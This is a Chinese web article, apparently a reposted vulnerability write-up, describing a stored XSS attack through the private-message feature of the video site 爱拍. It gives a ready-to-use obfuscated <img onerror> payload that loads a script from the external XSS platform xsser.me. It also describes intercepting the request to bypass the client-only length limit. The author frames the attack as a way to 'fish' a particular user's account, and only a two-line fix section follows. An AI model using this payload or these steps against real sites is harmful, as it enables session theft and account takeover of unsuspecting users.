当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

爱拍发信信息时突破长度限制

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

拍在发送短消息的时候,只过滤了<script>,没有过滤其他标签和<>,所以就产生了XSS。
 
话说上次XSSER让我去钓ID1001,我了个后悔啊,那天我再去复现这个漏洞,拼命给我报错,幸好,今天我再去试的话,成功复现

- -||
 
技术不精,不会写什么好的利用代码,就用XSSER的代码,但是发现,长度提醒超过了150字,仔细一看,只是做了客户端上面的限制,没有在服务器接口端进行长度限制,由于有TOKEN,所以得按正常步骤发,然后用截包工具拦截下载,然后就可以在content中输入长度无限的内容。



利用代码,www.xuhantao.com,IMG标签的onerror。
<img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxsser.me%2FUZH56T%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
 
 
第一次直接发代码<img>标签是全部会直接吞掉的、
所以先要给被害人发一个正常的短信息,然后在发信箱中点击查看,然后再在这个页面中发XSS
 


 
随便写点内容,按发送,同时截包,在content插代码,涛涛电脑知识网,然后,发送!
 
 
然后你需要做的,就是耐心等待鱼儿上钩了。
 



 
 
 
修复方案:

在服务器端限制长度
 
净化输入,过滤输出。
 
< -《
> - 》

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 涛涛知识分享网(www.xuhantao.com) © 2020 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 备案号:蒙ICP备15000590号